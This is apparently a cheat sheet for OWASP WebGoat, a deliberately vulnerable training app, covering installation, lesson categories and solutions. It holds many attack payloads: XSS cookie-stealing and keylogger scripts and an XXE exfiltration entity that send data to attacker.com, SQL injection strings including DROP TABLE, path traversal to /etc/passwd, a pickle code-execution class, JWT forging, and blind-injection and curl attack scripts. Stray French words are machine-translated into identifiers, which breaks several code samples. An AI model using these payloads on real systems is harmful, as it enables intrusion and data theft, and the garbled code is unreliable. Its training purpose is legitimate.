WebGoat aide-mémoire
Overview
WebGoat is a deliberately insecure application web developed by the Open application web Security Project (OWASP) to teach application web security concepts in an interactive and engaging manner. Unlike traditional security training materials, WebGoat provides a hands-on learning environment where users can practice identifying and exploiting application web vulnerabilities in a safe, controlled setting. The application is designed as a comprehensive educational platform that covers the OWASP Top 10 vulnerabilities and many additional security concepts through interactive lessons and challenges.
The platform distinguishes itself through its lesson-based approach, where each security concept is presented as a structured learning module with clear objectives, background information, and step-by-step guidance. WebGoat includes detailed explanations of vulnérabilité mechanics, real-world context, and remediation strategies, making it valuable for both beginners learning security fundamentals and experienced professionals seeking to understand specific attack techniques. The application tracks user progress, provides hints when needed, and offers immediate feedback on attempted solutions.
WebGoat's architecture is built on modern web technologies, utilizing Spring Boot for the backend and contemporary frontend frameworks for the user interface. This modern foundation ensures that the vulnerabilities and attack techniques demonstrated are relevant to current application web development practices. The platform includes both guided lessons with specific learning objectives and open-ended challenges that allow users to explore and experiment with different attack vectors.
The educational value of WebGoat extends beyond individual learning to classroom instruction and corporate training programs. The platform supports multiple user accounts, progress tracking, and administrative features that make it suitable for structured training environments. Many cybersecurity education programs, bootcamps, and corporate security awareness initiatives use WebGoat as a core component of their hands-on training curriculum.
Installation
Docker Installation (Recommended)
# Pull WebGoat Docker image
docker pull webgoat/webgoat-8.0
# Run WebGoat container
docker run -d -p 8080:8080 -p 9090:9090 --name webgoat webgoat/webgoat-8.0
# Access WebGoat
# Navigate to http://localhôte:8080/WebGoat
# WebWolf (support application): http://localhôte:9090/WebWolf
# Run with persistent data
docker run -d -p 8080:8080 -p 9090:9090 -v webgoat_data:/home/webgoat/.webgoat --name webgoat webgoat/webgoat-8.0
# Stop container
docker stop webgoat
# Remove container
docker rm webgoat
# View logs
docker logs webgoat
Docker Compose Installation
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
webgoat:
image: webgoat/webgoat-8.0
container_name: webgoat
ports:
- "8080: 8080"
- "9090: 9090"
volumes:
- webgoat_data: /home/webgoat/.webgoat
environment:
- WEBGOAT_port=8080
- WEBWOLF_port=9090
restart: unless-stopped
volumes:
webgoat_data:
EOF
# Start WebGoat
docker-compose up -d
# View logs
docker-compose logs -f webgoat
# Stop WebGoat
docker-compose down
# Stop and remove volumes
docker-compose down -v
Standalone JAR Installation
# Download WebGoat JAR
wget https://github.com/WebGoat/WebGoat/releases/download/v8.2.2/webgoat-server-8.2.2.jar
# Install Java (if not already installed)
# Ubuntu/Debian
sudo apt update
sudo apt install openjdk-11-jdk -y
# CentOS/RHEL
sudo yum install java-11-openjdk -y
# macOS
brew install openjdk@11
# Run WebGoat
java -jar webgoat-server-8.2.2.jar
# Run with custom port
java -jar webgoat-server-8.2.2.jar --server.port=9001
# Run with custom configuration
java -jar webgoat-server-8.2.2.jar --server.address=0.0.0.0 --server.port=8080
# Access WebGoat at http://localhôte:8080/WebGoat
Source Code Installation
# Install prerequisites
# Java 11+, Maven 3.6+, Git
# Clone repository
git clone https://github.com/WebGoat/WebGoat.git
cd WebGoat
# Build WebGoat
mvn clean install
# Run WebGoat
mvn spring-boot:run
# Build standalone JAR
mvn clean package
java -jar webgoat-server/cible/webgoat-server-*.jar
# Run WebWolf separately
cd webwolf
mvn spring-boot:run
Kubernetes Deployment
# Create webgoat-deployment.yaml
cat << 'EOF' > webgoat-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: webgoat
labels:
app: webgoat
spec:
replicas: 1
selector:
matchLabels:
app: webgoat
template:
metadata:
labels:
app: webgoat
spec:
containers:
- name: webgoat
image: webgoat/webgoat-8.0
ports:
- containerport: 8080
- containerport: 9090
env:
- name: WEBGOAT_port
value: "8080"
- name: WEBWOLF_port
value: "9090"
---
apiVersion: v1
kind: service
metadata:
name: webgoat-service
spec:
selector:
app: webgoat
ports:
- name: webgoat
port: 8080
cibleport: 8080
- name: webwolf
port: 9090
cibleport: 9090
type: LoadBalancer
EOF
# Deploy to Kubernetes
kubectl apply -f webgoat-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get services
# Access WebGoat
kubectl port-forward service/webgoat-service 8080: 8080
Initial Setup and configuration
First-Time Setup
# Access WebGoat
# Navigate to http://localhôte:8080/WebGoat
# Create user account
# Click "Register new user"
# nom d'utilisateur: your_nom d'utilisateur
# mot de passe: your_mot de passe
# Login to WebGoat
# Use created identifiants
# Access WebWolf (support application)
# Navigate to http://localhôte:9090/WebWolf
# Use same identifiants as WebGoat
User Management
# Default admin account (if enabled)
# nom d'utilisateur: admin
# mot de passe: admin
# Create additional users
# Each user has separate progress tracking
# Suitable for classroom environments
# Reset user progress
# Delete user data directory
# Or use admin interface (if available)
# Backup user progress
# Copy .webgoat directory
# Contains user data and progress
configuration options
# Custom server configuration
# Create application.properties
cat << 'EOF' > application.properties
server.port=8080
server.address=0.0.0.0
logging.level.org.owasp.webgoat=DEBUG
webgoat.user.directory=/custom/path
EOF
# Run with custom configuration
java -jar webgoat-server-*.jar --spring.config.location=application.properties
# Environment variables
export WEBGOAT_port=8080
export WEBWOLF_port=9090
export WEBGOAT_SSLENABLED=false
# JVM options
java -Xmx1024m -Xms512m -jar webgoat-server-*.jar
Lesson Categories and Modules
General Security Awareness
# HTTP Basics
# - Understanding HTTP protocole
# - Request/response structure
# - Headers and methods
# - Status codes
# HTTP Proxies
# - Proxy configuration
# - Intercepting requests
# - Modifying traffic
# - Burp Suite integration
# Developer Tools
# - Browser developer tools
# - Network tab analysis
# - Console manipulation
# - Source code inspection
authentification Flaws
# authentification Bypasses
# Lesson: Bypass authentification mechanisms
# Method 1: injection SQL in login
nom d'utilisateur: admin' --
mot de passe: anything
# Method 2: Logic flaws
# Analyze authentification logic
# Find bypass conditions
# Method 3: session manipulation
# Modify session jetons
# Predict session values
# mot de passe Reset Flaws
# Lesson: exploit mot de passe reset functionality
# Method 1: paramètre manipulation
# Change user paramètre in reset request
# Reset other users' mot de passes
# Method 2: jeton prediction
# Analyze reset jeton generation
# Predict valid jetons
# Secure mot de passes
# Lesson: mot de passe security concepts
# - mot de passe complexity
# - Common mot de passes
# - force brute attacks
# - mot de passe storage
Contrôle d'Accès Flaws
# Insecure Direct Object références
# Lesson: Access unauthorized resources
# Method 1: paramètre manipulation
# Change user ID in requests
# Access other users' data
# Method 2: Path traversal
# Modify file paths
# Access system files
# Missing Function Level Contrôle d'Accès
# Lesson: Access restricted functions
# Method 1: URL manipulation
# Access admin functions directly
# Bypass menu restrictions
# Method 2: Role manipulation
# Modify role paramètres
# Escalate privileges
cross-site scripting (XSS) (XSS)
# Reflected XSS
# Lesson: Execute JavaScript in victim's browser
# Basic charge utile
<script>alert('XSS')</script>
# Advanced charge utiles
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
# Bypass filters
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<script>alert(String.fromCharCode(88,83,83))</script>
# Stored XSS
# Lesson: Persistent XSS attacks
# Basic stored charge utile
<script>alert('Stored XSS')</script>
# Cookie stealing
<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>
# clélogger
<script>
document.onclépress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?clé=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>
# DOM-based XSS
# Lesson: Client-side XSS
# URL fragment manipulation
http://localhôte:8080/WebGoat/start.mvc#<script>alert('XSS')</script>
# JavaScript injection
javascript:alert('XSS')
Cross-Site Request Forgery (CSRF)
<form action="http://localhôte:8080/WebGoat/csrf/basic-get-drapeau" method="POST">
<input type="hidden" name="csrf" value="false">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhôte:8080/WebGoat/csrf/review" method="POST">
<input type="hidden" name="reviewText" value="This is a CSRF attack">
<input type="hidden" name="stars" value="1">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhôte:8080/WebGoat/csrf/basic-get-drapeau?csrf=false">
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhôte:8080/WebGoat/csrf/review', true);
xhr.onreadystatechange = function() \\\\{
if (xhr.readyState == 4) \\\\{
var jeton = xhr.responseText.match(/name="csrf" value="([^"]+)"/)[1];
// Use extracted jeton in CSRF attack
\\\\}
\\\\};
xhr.send();
</script>
injection SQL
# String injection SQL
# Lesson: Basic injection SQL
# authentification bypass
nom d'utilisateur: admin' --
mot de passe: anything
# Data extraction
' UNION SELECT user, mot de passe FROM users --
' UNION SELECT table_name, column_name FROM information_schema.columns --
# Numeric injection SQL
# Lesson: Injection in numeric paramètres
# Basic injection
1 OR 1=1
1 UNION SELECT user, mot de passe FROM users
# Advanced injection
1; DROP TABLE users; --
1; INSERT INTO users VALUES ('hacker', 'mot de passe'); --
# Blind injection SQL
# Lesson: Extract data without direct output
# Boolean-based blind injection
1 AND 1=1 (True condition)
1 AND 1=2 (False condition)
# Extract database name
1 AND LENGTH(database())=8
1 AND SUBSTRING(database(),1,1)='w'
# Time-based blind injection
1; WAITFOR DELAY '00:00:05' --
1 AND IF(1=1, SLEEP(5), 0)
# Advanced injection SQL
# Lesson: Complex injection scenarios
# Second-order injection
# Inject charge utile in one location
# Trigger execution in another
# Noinjection SQL
# MongoDB injection exemples
\\\\{"nom d'utilisateur": \\\\{"$ne": null\\\\}, "mot de passe": \\\\{"$ne": null\\\\}\\\\}
\\\\{"nom d'utilisateur": \\\\{"$regex": ".*"\\\\}, "mot de passe": \\\\{"$regex": ".*"\\\\}\\\\}
Path Traversal
# Path Traversal Lesson
# Objective: Access files outside web root
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hôtes
# Encoded traversal
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%252f..%252f..%252fetc%252fpasswd
# Double encoding
..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chôtes
# Null byte injection (older systems)
../../../etc/passwd%00
../../../etc/passwd%00.jpg
# Filter bypass
....//....//....//etc/passwd
..././..././..././etc/passwd
Insecure Deserialization
# Insecure Deserialization Lesson
# Objective: exploit deserialization vulnerabilities
# Java deserialization
# Create malicious serialized object
# Inject into application
# PHP deserialization
# Object injection charge utile
O:4:"User":2:\\\\{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";\\\\}
# Python pickle deserialization
# Create malicious pickle charge utile
import pickle
import os
class exploit:
def __reduce__(self):
return (os.system, ('whoami',))
charge utile = pickle.dumps(exploit())
# .NET deserialization
# BinaryFormatter exploitation
# Create malicious .NET object
XML External Entities (XXE)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
]>
<root></root>
JWT (JSON Web jetons)
# JWT Lesson: JSON Web jeton vulnerabilities
# JWT structure analysis
# Header.charge utile.signature
# Base64 decode each part
# algorithme confusion attack
# Change algorithme from RS256 to HS256
# Use public clé as HMAC secret
# None algorithme attack
# Set algorithme to "none"
# Remove signature
# Weak secret attack
# force brute JWT secret
# Use common mot de passes
# JWT manipulation
# Modify charge utile claims
# Change user role/permissions
# Extend jeton expiration
# exemple JWT manipulation
import jwt
import base64
# Decode JWT
jeton = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(jeton, verify=False)
# Modify charge utile
decoded['role'] = 'admin'
decoded['exp'] = 9999999999
# Re-encode with weak secret
new_jeton = jwt.encode(decoded, 'secret', algorithme='HS256')
Advanced Challenges
Challenge Solutions
# Admin Lost mot de passe Challenge
# Objective: Reset admin mot de passe
# Step 1: Analyze mot de passe reset mechanism
# Step 2: Find security questions
# Step 3: Research admin information
# Step 4: Answer security questions
# Step 5: Reset mot de passe
# Without mot de passe Change Challenge
# Objective: Change mot de passe without knowing current
# Method 1: session manipulation
# Intercept mot de passe change request
# Remove current mot de passe paramètre
# Method 2: CSRF attack
# Create CSRF form for mot de passe change
# Trick admin into submitting
# Admin mot de passe Up Challenge
# Objective: Escalate to admin privileges
# Method 1: injection SQL
# Extract admin mot de passe hash
# Crack or replace hash
# Method 2: session hijacking
# Steal admin session jeton
# Impersonate admin user
Custom exploit Development
#!/usr/bin/env python3
# WebGoat injection SQL exploit
import requests
import string
import sys
class WebGoatSQLi:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.session()
self.session.cookies.set('JsessionID', session_cookie)
def blind_sqli_extract(self, table, column, condition=""):
"""Extract data using blind injection SQL"""
data = ""
position = 1
while True:
found_char = False
for char in string.printable:
if char in ['%', '_', '\\']:
continue
# Construct blind injection SQL charge utile
charge utile = f"1' AND SUBSTRING((SELECT \\\\{column\\\\} FROM \\\\{table\\\\} \\\\{condition\\\\}),\\\\{position\\\\},1)='\\\\{char\\\\}' --"
response = self.test_injection(charge utile)
if self.is_successful_injection(response):
data += char
found_char = True
print(f"Found: \\\\{data\\\\}")
break
if not found_char:
break
position += 1
return data
def test_injection(self, charge utile):
"""Test injection SQL charge utile"""
url = f"\\\\{self.base_url\\\\}/SqlInjection/attack5a"
data = \\\\{
'account': charge utile,
'operator': 'equals',
'injection': charge utile
\\\\}
return self.session.post(url, data=data)
def is_successful_injection(self, response):
"""Check if injection was successful"""
return "User found" in response.text
if __name__ == "__main__":
if len(sys.argv) != 3:
print("utilisation: python3 webgoat_sqli.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
exploit = WebGoatSQLi(base_url, session_cookie)
# Extract admin mot de passe
print("Extracting admin mot de passe...")
mot de passe = exploit.blind_sqli_extract("users", "mot de passe", "WHERE nom d'utilisateur='admin'")
print(f"Admin mot de passe: \\\\{mot de passe\\\\}")
Automated Testing Scripts
#!/bin/bash
# WebGoat automated testing script
WEBGOAT_URL="http://localhôte:8080/WebGoat"
session_COOKIE=""
# Function to test XSS
test_xss() \\\\{
echo "[*] Testing XSS vulnerabilities..."
charge utiles=(
"<script>alert('XSS')</script>"
"<img src=x onerror=alert('XSS')>"
"<svg onload=alert('XSS')>"
)
for charge utile in "$\\\\{charge utiles[@]\\\\}"; do
response=$(curl -s -b "JsessionID=$session_COOKIE" \
-d "message=$charge utile" \
"$WEBGOAT_URL/CrossSiteScripting/attack1")
if [[ $response == *"$charge utile"* ]]; then
echo "[+] XSS successful: $charge utile"
else
echo "[-] XSS failed: $charge utile"
fi
done
\\\\}
# Function to test injection SQL
test_sqli() \\\\{
echo "[*] Testing injection SQL..."
charge utiles=(
"' OR '1'='1"
"' OR 1=1 --"
"' UNION SELECT user, mot de passe FROM users --"
)
for charge utile in "$\\\\{charge utiles[@]\\\\}"; do
response=$(curl -s -b "JsessionID=$session_COOKIE" \
-d "nom d'utilisateur=$charge utile&mot; de passe=test" \
"$WEBGOAT_URL/SqlInjection/attack1")
if [[ $response == *"Welcome"* ]]; then
echo "[+] injection SQL successful: $charge utile"
else
echo "[-] injection SQL failed: $charge utile"
fi
done
\\\\}
# Function to test CSRF
test_csrf() \\\\{
echo "[*] Testing CSRF vulnerabilities..."
# Create CSRF charge utile
csrf_charge utile="<form action='$WEBGOAT_URL/csrf/basic-get-drapeau' method='POST'>
<input type='hidden' name='csrf' value='false'>
</form>
<script>document.forms[0].submit();</script>"
echo "$csrf_charge utile" > csrf_test.html
echo "[+] CSRF charge utile created: csrf_test.html"
\\\\}
# Main execution
echo "[*] Starting WebGoat automated testing"
echo "[*] cible: $WEBGOAT_URL"
test_xss
test_sqli
test_csrf
echo "[*] Testing complete"
Integration with Security Tools
Burp Suite Integration
# Configure Burp Suite for WebGoat testing
# 1. Set up proxy
# Browser proxy: 127.0.0.1:8080
# Burp proxy listener: 127.0.0.1:8080
# 2. Configure scope
# Add WebGoat URL to scope
# Include: http://localhôte:8080/WebGoat/*
# 3. Spider WebGoat
# Automatically discover all endpoints
# Map application structure
# 4. Use Burp tools
# Repeater: Manual request testing
# Intruder: Automated charge utile testing
# Scanner: Automated vulnérabilité detection
# Burp Suite extensions for WebGoat
# - WebGoat lesson tracker
# - Automated solution checker
# - Custom charge utile generators
OWASP ZAP Integration
# ZAP automated scanning of WebGoat
zap-baseline.py -t http://localhôte:8080/WebGoat/
# ZAP full scan
zap-full-scan.py -t http://localhôte:8080/WebGoat/
# ZAP API utilisation
# Start ZAP démon
zap.sh -démon -port 8090
# Authenticate to WebGoat
curl "http://localhôte:8090/JSON/authentification/action/setauthentificationidentifiants/" \
-d "contextId=0&authidentifiantsConfigParams;=nom d'utilisateur%3Dtest%26mot de passe%3Dtest"
# Spider WebGoat
curl "http://localhôte:8090/JSON/spider/action/scan/?url=http://localhôte:8080/WebGoat/"
# Active scan
curl "http://localhôte:8090/JSON/ascan/action/scan/?url=http://localhôte:8080/WebGoat/"
# Generate report
curl "http://localhôte:8090/OTHER/core/other/htmlreport/" > webgoat_report.html
Custom Security Testing Framework
#!/usr/bin/env python3
# WebGoat comprehensive testing framework
import requests
import json
import time
from urllib.parse import urljoin
class WebGoatTester:
def __init__(self, base_url, nom d'utilisateur, mot de passe):
self.base_url = base_url
self.session = requests.session()
self.nom d'utilisateur = nom d'utilisateur
self.mot de passe = mot de passe
self.authenticated = False
def authenticate(self):
"""Authenticate to WebGoat"""
login_url = urljoin(self.base_url, '/login')
login_data = \\\\{
'nom d'utilisateur': self.nom d'utilisateur,
'mot de passe': self.mot de passe
\\\\}
response = self.session.post(login_url, data=login_data)
if response.status_code == 200:
self.authenticated = True
print("[+] authentification successful")
return True
else:
print("[-] authentification failed")
return False
def test_lesson(self, lesson_path, test_data):
"""Test specific WebGoat lesson"""
if not self.authenticated:
if not self.authenticate():
return False
lesson_url = urljoin(self.base_url, lesson_path)
try:
response = self.session.post(lesson_url, data=test_data)
# Check for success indicators
if any(indicator in response.text.lower() for indicator in
['congratulations', 'success', 'correct', 'well done']):
print(f"[+] Lesson \\\\{lesson_path\\\\} completed successfully")
return True
else:
print(f"[-] Lesson \\\\{lesson_path\\\\} failed")
return False
except Exception as e:
print(f"[!] Error testing lesson \\\\{lesson_path\\\\}: \\\\{e\\\\}")
return False
def run_all_tests(self):
"""Run all available tests"""
test_cases = [
\\\\{
'lesson': '/SqlInjection/attack1',
'data': \\\\{'nom d'utilisateur': "' OR '1'='1", 'mot de passe': 'test'\\\\}
\\\\},
\\\\{
'lesson': '/CrossSiteScripting/attack1',
'data': \\\\{'message': '<script>alert("XSS")</script>'\\\\}
\\\\},
\\\\{
'lesson': '/CSRF/basic-get-drapeau',
'data': \\\\{'csrf': 'false'\\\\}
\\\\}
]
results = []
for test_case in test_cases:
result = self.test_lesson(test_case['lesson'], test_case['data'])
results.append(\\\\{
'lesson': test_case['lesson'],
'success': result
\\\\})
return results
def generate_report(self, results):
"""Generate test report"""
report = \\\\{
'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
'cible': self.base_url,
'total_tests': len(results),
'passed': sum(1 for r in results if r['success']),
'failed': sum(1 for r in results if not r['success']),
'results': results
\\\\}
with open('webgoat_test_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"\n[*] Test Report Generated")
print(f"Total Tests: \\\\{report['total_tests']\\\\}")
print(f"Passed: \\\\{report['passed']\\\\}")
print(f"Failed: \\\\{report['failed']\\\\}")
print(f"Success Rate: \\\\{(report['passed']/report['total_tests'])*100:.1f\\\\}%")
if __name__ == "__main__":
tester = WebGoatTester("http://localhôte:8080/WebGoat", "test", "test")
results = tester.run_all_tests()
tester.generate_report(results)
Educational Best Practices
Structured Learning Path
# Phase 1: Foundation (Weeks 1-2)
# - HTTP Basics
# - Developer Tools
# - Basic authentification
# - Simple XSS
# Phase 2: Core Vulnerabilities (Weeks 3-6)
# - injection SQL (all types)
# - XSS (reflected, stored, DOM)
# - CSRF
# - Contrôle d'Accès
# Phase 3: Advanced Topics (Weeks 7-10)
# - XXE
# - Insecure Deserialization
# - JWT vulnerabilities
# - Path Traversal
# Phase 4: Integration (Weeks 11-12)
# - Tool utilisation (Burp, ZAP)
# - Automated testing
# - Report writing
# - Real-world application
Progress Tracking
# Create learning journal
mkdir ~/webgoat_learning
cd ~/webgoat_learning
# Track lesson completion
cat << 'EOF' > progress.md
# WebGoat Learning Progress
## Completed Lessons
- [ ] HTTP Basics
- [ ] Developer Tools
- [ ] injection SQL - String
- [ ] injection SQL - Numeric
- [ ] injection SQL - Blind
- [ ] XSS - Reflected
- [ ] XSS - Stored
- [ ] XSS - DOM
- [ ] CSRF
- [ ] Contrôle d'Accès
- [ ] Path Traversal
- [ ] XXE
- [ ] JWT
- [ ] Insecure Deserialization
## Notes
### injection SQL
- clé learning: Always use paramètreized queries
- Common mistake: Trusting user input
### XSS
- clé learning: Validate and encode all user input
- Common mistake: Only server-side validation
EOF
# Document solutions
cat << 'EOF' > solutions.md
# WebGoat Solutions
## injection SQL - String
**Objective**: Bypass authentification
**Solution**: nom d'utilisateur: `admin' --`, mot de passe: `anything`
**Explanation**: Comment out mot de passe check
## XSS - Reflected
**Objective**: Execute JavaScript
**Solution**: `<script>alert('XSS')</script>`
**Explanation**: No input validation
EOF
Classroom Integration
# Multi-user setup for classroom
# Each student gets unique account
# Progress tracked separately
# Instructor dashboard
# Monitor student progress
# Identify common issues
# Provide cibleed help
# Group exercises
# Team-based challenges
# Peer review sessions
# Collaborative problem solving
# Assessment integration
# Automated grading
# Progress reports
# Skill verification
⚠️ Security Notice: WebGoat is a deliberately vulnerable application web designed for educational purposes only. It should never be deployed on production networks or systems accessible from the internet. Always run WebGoat in isolated, controlled environments such as virtual machines or containers with no network access to production systems. The application contains intentional security vulnerabilities that could compromise system security if exposed. Use WebGoat responsibly for learning application web security concepts and always follow your organization's security policies when conducting security training.
📚 Additional Resources: - WebGoat Official GitHub Repository - OWASP WebGoat Project Page - OWASP Top 10 - Web Security Academy